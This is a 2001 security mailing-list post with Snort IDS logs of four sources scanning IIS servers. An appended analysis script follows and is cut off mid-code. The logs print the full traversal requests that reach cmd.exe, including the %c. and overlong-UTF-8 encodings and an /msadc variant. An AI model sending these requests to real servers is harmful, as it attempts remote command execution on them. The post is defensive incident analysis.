4 similar IIS attempts in a 48 hour period.

From: Steve Halligan (agent33at_private)
Date: Tue May 08 2001 - 07:24:03 PDT


    I got these 4 attempts from different sources in a rather small window of
    time.  They all start out with a portscan of port 80, so I don't think it is
    the same person (Why would they need to rescan each time?).  You will note
    that the order of the variation of the attempts is similar.  Is this a new
    worm?  A new tool?
    
    -Steve
    
    ----------------BEGIN SCAN REPORTS----------------------
    *****************************SCAN #1*****************************************
    ----------------------------------------------------------------------------
    --
    #(1 - 2059) [2001-05-05 21:20:45] 305
    IPv4: 207.51.58.7 -> 209.46.94.85
          hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
    TCP:  port=41385 -> dport: 80  flags=******S* seq=3959699664
          ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
          Options:
           #1 - MSS len=4 data=05B40000
    Payload: none
    ----------------------------------------------------------------------------
    --
    #(1 - 2081) [2001-05-06 12:06:16] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
    TCP:  port=42384 -> dport: 80  flags=***AP*** seq=4087665554
          ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2082) [2001-05-06 12:06:17] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
    TCP:  port=42746 -> dport: 80  flags=***AP*** seq=4111537358
          ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2083) [2001-05-06 12:06:18] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
    TCP:  port=43046 -> dport: 80  flags=***AP*** seq=4129406045
          ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2084) [2001-05-06 12:06:19] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
    TCP:  port=44051 -> dport: 80  flags=***AP*** seq=4191243658
          ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2085) [2001-05-06 12:06:20] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
    TCP:  port=45036 -> dport: 80  flags=***AP*** seq=4254676574
          ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2086) [2001-05-06 12:06:21] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
    TCP:  port=45723 -> dport: 80  flags=***AP*** seq=3643186
          ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2087) [2001-05-06 12:06:22] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
    TCP:  port=46489 -> dport: 80  flags=***AP*** seq=54010263
          ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2088) [2001-05-06 12:06:23] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
    TCP:  port=47320 -> dport: 80  flags=***AP*** seq=104581118
          ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2089) [2001-05-06 12:06:24] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
    TCP:  port=48175 -> dport: 80  flags=***AP*** seq=160395667
          ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2090) [2001-05-06 12:06:25] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
    TCP:  port=49033 -> dport: 80  flags=***AP*** seq=213665368
          ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
    Payload:  length = 63
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2091) [2001-05-06 12:06:26] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
    TCP:  port=49954 -> dport: 80  flags=***AP*** seq=270239886
          ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
    Payload:  length = 64
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
    010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
    020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
    030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2092) [2001-05-06 12:06:27] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
    TCP:  port=50870 -> dport: 80  flags=***AP*** seq=328007726
          ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
    Payload:  length = 65
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
    010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
    020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
    030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
    040 : 0A                                                .
    ----------------------------------------------------------------------------
    --
    #(1 - 2093) [2001-05-06 12:06:28] 62
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
    TCP:  port=51840 -> dport: 80  flags=***AP*** seq=378946693
          ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
    Payload:  length = 66
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
    010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
    020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
    030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
    040 : 0D 0A                                             ..
    ----------------------------------------------------------------------------
    --
    #(1 - 2094) [2001-05-06 12:06:29] 56
    IPv4: 207.51.58.7 -> 209.46.94.82
          hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
    TCP:  port=52623 -> dport: 80  flags=***AP*** seq=427404423
          ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
    Payload:  length = 77
    
    000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
    010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
    020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
    030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
    040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....
    
    
    
    ****************************SCAN #2*******************************************
    ----------------------------------------------------------------------------
    --
    #(1 - 2075) [2001-05-06 11:25:12] 317
    IPv4: 207.78.143.235 -> 209.46.94.85
          hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
    TCP:  port=56344 -> dport: 80  flags=******S* seq=823530689
          ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
          Options:
           #1 - MSS len=4 data=05B40000
    Payload: none
    ----------------------------------------------------------------------------
    --
    #(1 - 2121) [2001-05-06 18:08:07] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
    TCP:  port=57118 -> dport: 80  flags=***AP*** seq=3412786496
          ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2122) [2001-05-06 18:08:07] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
    TCP:  port=57170 -> dport: 80  flags=***AP*** seq=3415977274
          ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2123) [2001-05-06 18:08:18] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
    TCP:  port=57326 -> dport: 80  flags=***AP*** seq=3426276033
          ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2124) [2001-05-06 18:08:18] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
    TCP:  port=64799 -> dport: 80  flags=***AP*** seq=3904402609
          ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2125) [2001-05-06 18:08:28] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
    TCP:  port=65302 -> dport: 80  flags=***AP*** seq=3936366689
          ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2126) [2001-05-06 18:08:29] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
    TCP:  port=39706 -> dport: 80  flags=***AP*** seq=107054918
          ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2127) [2001-05-06 18:08:29] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
    TCP:  port=39709 -> dport: 80  flags=***AP*** seq=107263367
          ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2128) [2001-05-06 18:08:29] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
    TCP:  port=39965 -> dport: 80  flags=***AP*** seq=124410128
          ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2129) [2001-05-06 18:08:30] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
    TCP:  port=40329 -> dport: 80  flags=***AP*** seq=148806580
          ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2130) [2001-05-06 18:08:34] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
    TCP:  port=40585 -> dport: 80  flags=***AP*** seq=164770468
          ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
    Payload:  length = 63
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2131) [2001-05-06 18:08:34] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
    TCP:  port=43268 -> dport: 80  flags=***AP*** seq=341732227
          ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
    Payload:  length = 64
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
    010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
    020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
    030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2132) [2001-05-06 18:08:38] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
    TCP:  port=43341 -> dport: 80  flags=***AP*** seq=346538415
          ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
    Payload:  length = 65
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
    010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
    020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
    030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
    040 : 0A                                                .
    ----------------------------------------------------------------------------
    --
    #(1 - 2133) [2001-05-06 18:08:38] 62
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
    TCP:  port=46205 -> dport: 80  flags=***AP*** seq=530846163
          ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
    Payload:  length = 66
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
    010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
    020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
    030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
    040 : 0D 0A                                             ..
    ----------------------------------------------------------------------------
    --
    #(1 - 2134) [2001-05-06 18:08:42] 56
    IPv4: 207.78.143.235 -> 209.46.94.82
          hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
    TCP:  port=46362 -> dport: 80  flags=***AP*** seq=541605131
          ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
    Payload:  length = 77
    
    000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
    010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
    020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
    030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
    040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....
    
    ***************************SCAN #3**********************************************************
    
    ----------------------------------------------------------------------------
    --
    #(1 - 2147) [2001-05-07 02:22:21]  spp_portscan: PORTSCAN DETECTED from
    210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
    IPv4: 210.107.187.10 -> 209.46.94.85
          hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
    TCP:  port=50799 -> dport: 80  flags=******S* seq=2338995863
          ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
          Options:
           #1 - MSS len=4 data=05B40000
    Payload: none
    ----------------------------------------------------------------------------
    --
    #(1 - 2181) [2001-05-07 12:01:30]  WEB-IIS cmd.exe access
    IPv4: 210.107.187.10 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
    TCP:  port=61125 -> dport: 80  flags=***AP*** seq=941135384
          ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2182) [2001-05-07 12:01:31]  WEB-IIS cmd.exe access
    IPv4: 210.107.187.10 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
    TCP:  port=61278 -> dport: 80  flags=***AP*** seq=951451170
          ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    
    
    ************************SCAN #4*******************************************
    #(1 - 2150) [2001-05-07 03:07:07] 340
    IPv4: 202.107.211.177 -> 209.46.94.80
          hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
    TCP:  port=56725 -> dport: 80  flags=******S* seq=3486124858
          ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
          Options:
           #1 - MSS len=4 data=05B40000
    Payload: none
    ----------------------------------------------------------------------------
    --
    #(1 - 2173) [2001-05-07 10:15:58] 62
    IPv4: 202.107.211.177 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
    TCP:  port=32840 -> dport: 80  flags=***AP*** seq=1452480610
          ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    ----------------------------------------------------------------------------
    --
    #(1 - 2174) [2001-05-07 10:16:00] 62
    IPv4: 202.107.211.177 -> 209.46.94.82
          hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
    TCP:  port=33972 -> dport: 80  flags=***AP*** seq=1515064652
          ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
    Payload:  length = 62
    
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
    
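An added example (not part of Steve's post or of the sensor's own tooling) that makes the observation above checkable: it reassembles the Snort-style payload dumps into bytes, decodes each request path the way a permissive decoder would (single-pass %XX decoding, then UTF-8 decoding that tolerates overlong and 5/6-byte forms but reports them), labels the encoding trick each request used, and records the ordered sequence of labels per source address. The three sample records are copied from scan #1 of the post; the second source is synthesised by relabelling them, since scan #2 carries byte-identical payloads. The function names, the label strings, and the per-source fingerprint idea are assumptions of this example, not anything on the page.

```python
"""Fingerprint the traversal-encoding sequence per source from Snort payload dumps.
Added example; sample records come from scan #1 of the post, second source is relabelled."""
import re

# Constructed sample: three records copied from scan #1 (IPv4 header + payload hex dump).
SCAN1 = """\
IPv4: 207.51.58.7 -> 209.46.94.82
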